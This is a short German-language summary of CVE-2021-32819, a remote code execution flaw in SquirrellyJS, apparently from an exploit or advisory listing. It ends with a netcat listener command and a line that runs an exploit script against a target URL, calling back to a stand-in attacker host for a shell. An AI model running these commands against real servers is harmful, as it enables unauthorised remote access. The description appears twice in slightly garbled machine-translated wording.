
SquirrellyJS vermischt reine Vorlagendaten mit Engine-Konfigurationsoptionen über die Express-Render-API. Durch Überschreiben interner Konfigurationsoptionen kann in nachgelagerten Anwendungen eine Remote-Code-Ausführung ausgelöst werden.
CVE-2021-32819 : SquirrellyJS mischt reine Vorlagendaten mit Motorkonfigurationsoptionen über die Express-Render-API. Durch Überschreiben interner Konfigurationsoptionen kann in nachgelagerten Anwendungen Remote-Code-Ausführung ausgelöst werden.
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
v8.0.0 >= v8.0.8 Remotecodeausführung
Ubuntu 20.04.1
nc -lvp 443
python3 exploit.py http://example.com/ ATTACKER_HOST 443
